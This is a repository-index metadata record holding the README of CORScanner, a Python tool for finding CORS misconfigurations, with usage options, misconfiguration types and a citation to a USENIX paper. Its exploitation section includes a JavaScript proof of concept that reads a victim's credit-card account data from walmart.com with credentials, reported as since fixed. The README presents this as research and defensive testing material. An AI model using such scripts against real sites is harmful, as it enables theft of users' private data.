{"id":13625940,"url":"https://github.com/chenjj/CORScanner","last_synced_at":"2025-04-16T11:30:57.485Z","repository":{"id":38237978,"uuid":"132311222","full_name":"chenjj/CORScanner","owner":"chenjj","description":"🎯 Fast CORS misconfiguration vulnerabilities scanner","archived":false,"fork":false,"pushed_at":"2021-11-25T07:25:11.000Z","size":2809,"stargazers_count":1076,"open_issues_count":1,"forks_count":182,"subscribers_count":20,"default_branch":"master","last_synced_at":"2025-04-14T08:13:35.424Z","etag":null,"topics":["cors","cors-misconfigurations","cors-policy","cors-scanner","python","python3","vulnerability-scanners","web-security"],"latest_commit_sha":null,"homepage":"https://pypi.org/project/cors/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/chenjj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-05-06T05:57:09.000Z","updated_at":"2025-04-12T00:19:02.000Z","dependencies_parsed_at":"2022-07-12T01:30:58.015Z","dependency_job_id":null,"html_url":"https://github.com/chenjj/CORScanner","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/chenjj","download_url":"https://codeload.git
hub.com/chenjj/CORScanner/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249235030,"owners_count":21235131,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cors","cors-misconfigurations","cors-policy","cors-scanner","python","python3","vulnerability-scanners","web-security"],"created_at":"2024-08-01T21:02:06.195Z","updated_at":"2025-04-16T11:30:57.446Z","avatar_url":"https://github.com/chenjj.png","language":"Python","readme":"## About CORScanner\n\nCORScanner is a Python tool designed to discover CORS misconfiguration vulnerabilities in websites. It helps website administrators and penetration testers check whether the domains/URLs they are targeting have insecure CORS policies.\n\n### Features\n* **Fast**. It uses [gevent](https://github.com/gevent/gevent) instead of Python threads for concurrency, which is much faster for network scanning.\n* **Comprehensive**. It covers all [the common types of CORS misconfigurations](#misconfiguration-types) we know of.\n* **Flexible**. It supports various configurable features (e.g. 
file output), which is helpful for large-scale scanning.\n* 🆕 CORScanner supports installation via pip (`pip install corscanner` or `pip install cors`).\n* 🆕 CORScanner can be used as a library in your project.\n\nTwo useful references for understanding CORS systematically:\n* USENIX Security 18 paper: [We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS](https://www.jianjunchen.com/p/CORS-USESEC18.pdf)\n* Detailed explanation in Chinese: [Bypassing the browser SOP to steal information cross-site: a CORS misconfiguration vulnerability report and best deployment practices](https://www.jianjunchen.com/post/cors%E5%AE%89%E5%85%A8%E9%83%A8%E7%BD%B2%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5/)\n\n\n\u003cdetails\u003e\u003csummary\u003ePlease consider citing our paper if you do scientific research (Click me).  \u003c/summary\u003e\n\u003cp\u003e\n\n*LaTeX version:*\n\n```tex\n@inproceedings{chen-cors,\nauthor = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},\ntitle = {We Still Don{\\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},\nbooktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},\nyear = {2018},\nisbn = {978-1-939133-04-5},\naddress = {Baltimore, MD},\npages = {1079--1093},\nurl = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},\npublisher = {{USENIX} Association},\nmonth = aug,\n}\n```\n\n*Word version:*\n\nJianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. \"We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS.\" In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 
2018.\n\n\u003c/p\u003e\n\u003c/details\u003e\n\n## Screenshots\n\n![CORScanner](https://github.com/chenjj/CORScanner/raw/master/images/screenshot.png \"CORScanner in action\")\n\n## Installation\n\n- Download this tool:\n```\ngit clone https://github.com/chenjj/CORScanner.git\n```\n\n- Install dependencies:\n```\nsudo pip install -r requirements.txt\n```\nCORScanner depends on the `requests`, `gevent`, `tldextract`, `colorama` and `argparse` Python modules.\n\n## Python version\n\n* Both Python 2 (**2.7.x**) and Python 3 (**3.7.x**) are supported.\n\n## CORScanner as a library\n\n- Install CORScanner via pip:\n\n```\nsudo pip install corscanner\n```\n\nor use the short name:\n\n```\nsudo pip install cors\n```\n\n- Example code:\n```python\n\u003e\u003e\u003e from CORScanner.cors_scan import cors_check\n\u003e\u003e\u003e ret = cors_check(\"https://www.instagram.com\", None)\n\u003e\u003e\u003e ret\n{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}\n```\n\nYou can also use CORScanner via the `corscanner` or `cors` command: `cors -vu https://www.instagram.com`\n\n## Usage\n\nShort Form    | Long Form     | Description\n------------- | ------------- |-------------\n-u            | --url         | URL/domain to check its CORS policy\n-d            | --headers     | Add headers to the request\n-i            | --input       | URL/domain list file to check their CORS policy\n-t            | --threads     | Number of threads to use for the CORS scan\n-o            | --output      | Save the results to a JSON file\n-v            | --verbose     | Enable verbose mode and display results in real time\n-T            | --timeout     | Set the requests timeout (default 10 sec)\n-p            | --proxy       | Enable a proxy (http or socks5)\n-h            | --help        | Show the help message and exit\n\n### Examples\n\n* To check CORS misconfigurations of a specific domain:\n\n``python cors_scan.py 
-u example.com``\n\n* To enable more debug info, use -v:\n\n``python cors_scan.py -u example.com -v``\n\n* To save scan results to a JSON file, use -o:\n\n``python cors_scan.py -u example.com -o output_filename``\n\n* To check CORS misconfigurations of a specific URL:\n\n``python cors_scan.py -u http://example.com/restapi``\n\n* To check CORS misconfigurations with specific headers:\n\n``python cors_scan.py -u example.com -d \"Cookie: test\"``\n\n* To check CORS misconfigurations of multiple domains/URLs:\n\n``python cors_scan.py -i top_100_domains.txt -t 100``\n\n* To enable a proxy for CORScanner, use -p:\n\n``python cors_scan.py -u example.com -p http://127.0.0.1:8080``\n\nTo use a SOCKS5 proxy, install PySocks with `pip install PySocks`:\n\n``python cors_scan.py -u example.com -p socks5://127.0.0.1:8080``\n\n* To list all the basic options and switches, use the -h switch:\n\n``python cors_scan.py -h``\n\n## Misconfiguration types\nThis tool covers the following misconfiguration types:\n\nMisconfiguration type    | Description\n------------------------ | --------------------------\nReflect_any_origin       | Blindly reflects the Origin header value in the `Access-Control-Allow-Origin` response header, which means any website can read the site's secrets by sending cross-origin requests.\nPrefix_match             | `www.example.com` trusts `example.com.evil.com`, which is an attacker's domain.\nSuffix_match             | `www.example.com` trusts `evilexample.com`, which could be registered by an attacker.\nNot_escape_dot           | `www.example.com` trusts `wwwaexample.com`, which could be registered by an attacker.\nSubstring_match          | `www.example.com` trusts `example.co`, which could be registered by an attacker.\nTrust_null               | `www.example.com` trusts `null`, which can be forged by scripts in a sandboxed iframe.\nHTTPS_trust_HTTP         | Risky trust dependency: a MITM attacker may steal the HTTPS site's secrets.\nTrust_any_subdomain      | Risky trust dependency: 
an XSS on any subdomain may steal the site's secrets.\nCustom_third_parties     | Custom unsafe third-party origins such as `github.io`; see the [origins.json](./origins.json) file for the full list. Thanks [@phackt](https://github.com/phackt)!\nSpecial_characters_bypass| Exploits browsers’ handling of special characters. Most of them only work in Safari, except `_`, which also works in Chrome and Firefox. See more in [Advanced CORS Exploitation Techniques](https://www.corben.io/advanced-cors-techniques/). Thanks [@Malayke](https://github.com/Malayke).\n  \nContributions of more misconfiguration types are welcome.  \n  \n## Exploitation examples\nHere is an example of how to exploit the \"Reflect_any_origin\" misconfiguration on Walmart.com (since fixed). Localhost plays the malicious website in the video.\n\nWalmart.com video on YouTube:\n\n[![Walmart_CORS_misconfiguration_exploitation](https://github.com/chenjj/CORScanner/raw/master/images/walmart.png)](http://www.youtube.com/watch?v=3abaevsSHXY)\n\nHere is the exploitation code:\n```javascript\n\u003cscript\u003e\n    // Send a cross-origin request to the walmart.com server when a victim visits the page.\n    var req = new XMLHttpRequest();\n    req.open('GET', \"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card\", true);\n    req.onload = stealData;\n    req.withCredentials = true;\n    req.send();\n\n    function stealData() {\n        // Reading the response is allowed because of the CORS misconfiguration.\n        var data = JSON.stringify(JSON.parse(this.responseText), null, 2);\n\n        // Display the data on the page. 
A real attacker would send the data to their own server instead.\n        output(data);\n    }\n\n    function output(inp) {\n        document.body.appendChild(document.createElement('pre')).innerHTML = inp;\n    }\n\u003c/script\u003e\n```\n\nOnce you understand how the demo works, read Section 5 and Section 6 of the [CORS paper](https://www.jianjunchen.com/publication/an-empirical-study-of-cors/) to learn how the other misconfigurations can be exploited.\n\n## License\n\nCORScanner is licensed under the MIT license. Take a look at the [LICENSE](./LICENSE) for more information.\n\n\n## Credits\nThis work is inspired by the following excellent research:\n\n* James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016\n* Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”, AppSecUSA 2016\n* Von Jens Müller, \"CORS misconfigurations on a large scale\", [CORStest](https://github.com/RUB-NDS/CORStest)\n\n","funding_links":[],"categories":["Tools","Python (1887)","Python","漏洞扫描"],"sub_categories":["Scanner"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchenjj%2FCORScanner","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchenjj%2FCORScanner","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchenjj%2FCORScanner/lists"}